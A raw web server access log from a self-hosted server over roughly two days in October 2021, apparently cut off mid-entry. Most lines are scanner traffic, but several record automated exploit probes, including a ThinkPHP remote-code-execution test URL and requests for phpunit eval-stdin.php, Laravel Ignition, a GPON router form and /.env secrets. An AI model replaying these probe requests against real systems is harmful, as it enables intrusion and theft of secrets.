"/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [25/Oct/2021:11:30:28 +0000] 444 - GET https agent.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [25/Oct/2021:11:55:49 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [25/Oct/2021:13:10:45 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.197.181] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Oct/2021:13:54:30 +0000] 444 - GET https opds.moralanimal.net "/" [Client 92.118.160.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [25/Oct/2021:14:25:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.200.69] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Oct/2021:15:28:19 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [25/Oct/2021:15:40:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Oct/2021:16:16:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.59.1] [Length 0] [Gzip -] "HTTP Banner Detection (https://security.ipip.net)" "-" [25/Oct/2021:16:30:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Oct/2021:17:03:30 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Oct/2021:17:03:30 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Oct/2021:17:03:30 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Oct/2021:17:03:30 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Oct/2021:17:03:30 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Oct/2021:17:03:30 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Oct/2021:18:24:53 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [25/Oct/2021:18:41:09 +0000] 444 - GET https home.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [25/Oct/2021:20:58:31 +0000] 400 - GET https localhost "/" [Client 161.35.188.242] [Length 154] [Gzip -] "-" "-" [25/Oct/2021:20:58:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 161.35.188.242] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [25/Oct/2021:21:39:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Oct/2021:22:07:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [25/Oct/2021:22:07:54 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211026060604" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [25/Oct/2021:22:55:58 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:22:55:59 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:22:56:00 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:22:56:01 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [25/Oct/2021:22:56:01 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:22:56:03 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:22:56:03 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:22:56:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:22:56:06 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:22:56:08 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [25/Oct/2021:22:56:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:22:56:09 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:22:56:11 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:22:58:32 +0000] 444 - GET https 64.22.31.253 "/login?returnURL=%2F" [Client 92.118.160.41] [Length 0] [Gzip -] "Go http package" "-" [26/Oct/2021:00:17:15 +0000] 400 - HEAD http localhost "/" [Client 46.101.96.30] [Length 0] [Gzip -] "-" "-" [26/Oct/2021:00:17:16 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 46.101.96.30] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Oct/2021:00:17:16 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 46.101.96.30] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Oct/2021:00:17:17 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 46.101.96.30] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Oct/2021:00:17:18 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 46.101.96.30] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Oct/2021:00:17:18 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 46.101.96.30] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Oct/2021:00:17:19 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 46.101.96.30] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Oct/2021:00:17:20 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 46.101.96.30] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Oct/2021:00:17:20 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 46.101.96.30] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Oct/2021:00:17:21 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 46.101.96.30] [Length 252] [Gzip -] "VLC/3.0.8 LibVLC/3.0.8" "-" [26/Oct/2021:00:17:21 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 46.101.96.30] [Length 0] [Gzip -] "VLC/3.0.8 LibVLC/3.0.8" "-" [26/Oct/2021:00:17:21 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 46.101.96.30] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Oct/2021:00:17:22 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 46.101.96.30] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Oct/2021:00:17:23 +0000] 400 - GET http 64.22.31.253 "/gemini-iptv/vod.json" [Client 46.101.96.30] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Oct/2021:00:17:23 +0000] 444 - GET https 64.22.31.253 "/gemini-iptv/vod.json" [Client 46.101.96.30] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Oct/2021:00:17:23 +0000] 400 - GET http 64.22.31.253 "/" [Client 46.101.96.30] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Oct/2021:00:17:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 46.101.96.30] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Oct/2021:00:33:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Oct/2021:01:46:41 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.202] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Oct/2021:02:22:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.62] [Length 0] [Gzip -] "-" "-" [26/Oct/2021:02:31:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [26/Oct/2021:02:44:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.193] [Length 0] [Gzip -] "-" "-" [26/Oct/2021:02:44:32 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.193] [Length 252] [Gzip -] "-" "-" [26/Oct/2021:02:44:32 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.193] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [26/Oct/2021:02:57:41 +0000] 444 - GET https router.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [26/Oct/2021:04:22:08 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [26/Oct/2021:04:30:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Oct/2021:05:10:05 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Oct/2021:05:11:32 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.208.195] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Oct/2021:05:11:51 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.206] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Oct/2021:07:00:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.115] [Length 0] [Gzip -] "-" "-" [26/Oct/2021:07:00:14 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.115] [Length 252] [Gzip -] "-" "-" [26/Oct/2021:07:00:14 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.115] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [26/Oct/2021:07:24:12 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [26/Oct/2021:07:50:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Oct/2021:08:28:00 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [26/Oct/2021:08:28:19 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Oct/2021:08:28:20 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Oct/2021:08:42:01 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.203.88] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Oct/2021:10:53:28 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 69.30.217.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [26/Oct/2021:10:55:35 +0000] 400 - OPTIONS http 64.22.31.253 "/" [Client 212.102.34.251] [Length 252] [Gzip -] "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52" "-" [26/Oct/2021:11:22:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 92.118.161.33] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [26/Oct/2021:12:04:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.209.125.20] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [26/Oct/2021:12:48:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.80] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Oct/2021:12:53:16 +0000] 444 - GET https booksonic.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [26/Oct/2021:13:12:46 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.204.147] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Oct/2021:14:25:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.205.169] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Oct/2021:15:14:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.116] [Length 0] [Gzip -] "-" "-" [26/Oct/2021:15:14:26 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.116] [Length 252] [Gzip -] "-" "-" [26/Oct/2021:15:14:26 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.116] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [26/Oct/2021:15:23:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Oct/2021:15:36:57 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [26/Oct/2021:16:52:12 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [26/Oct/2021:16:52:15 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [26/Oct/2021:17:21:34 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Oct/2021:17:21:34 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Oct/2021:17:21:38 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Oct/2021:17:21:41 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Oct/2021:17:21:41 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Oct/2021:17:21:42 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [26/Oct/2021:17:21:44 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Oct/2021:17:21:44 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Oct/2021:17:21:45 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Oct/2021:17:21:46 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Oct/2021:17:21:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Oct/2021:17:21:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Oct/2021:17:21:49 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [26/Oct/2021:17:21:53 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [26/Oct/2021:18:35:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Oct/2021:19:48:36 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 23.95.191.195] [Length 0] [Gzip -] "curl/7.3.2" "-" [26/Oct/2021:21:58:08 +0000] 400 - - http localhost "-" [Client 87.251.64.138] [Length 154] [Gzip -] "-" "-" [26/Oct/2021:22:29:31 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [26/Oct/2021:22:47:21 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.202.68] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Oct/2021:23:04:14 +0000] 400 - GET http 64.22.31.253 "/cgi-bin/login.cgi?requestname=2&cmd=0" [Client 121.46.25.189] [Length 252] [Gzip -] "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10" "-" [26/Oct/2021:23:04:19 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 121.46.25.189] [Length 654] [Gzip -] "like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4094.1 Safari/537.36\x22" "-" [26/Oct/2021:23:04:36 +0000] 400 - GET http 64.22.31.253 "/cgi-bin/login.cgi?requestname=3&cmd=0" [Client 121.46.25.189] [Length 252] [Gzip -] "2.0.1) Gecko/20100101 Firefox/4.0.1\x22" "-" [26/Oct/2021:23:04:39 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 121.46.25.189] [Length 654] [Gzip -] "like Gecko) Chrome/17.0.963.56 Safari/535.11\x22" "-" [26/Oct/2021:23:05:21 +0000] 400 - GET http 64.22.31.253 "/por/login_psw.csp" [Client 121.46.25.189] [Length 252] [Gzip -] "\x22Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv" "-" [26/Oct/2021:23:05:26 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 121.46.25.189] [Length 252] [Gzip -] "\x22Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML" "-" [26/Oct/2021:23:06:44 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.205.252] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Oct/2021:00:17:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.83.66.17] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [27/Oct/2021:00:46:47 +0000] 400 - - http localhost "-" [Client 89.248.165.120] [Length 154] [Gzip -] "-" "-" [27/Oct/2021:01:47:18 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.200.22] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [27/Oct/2021:03:19:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, 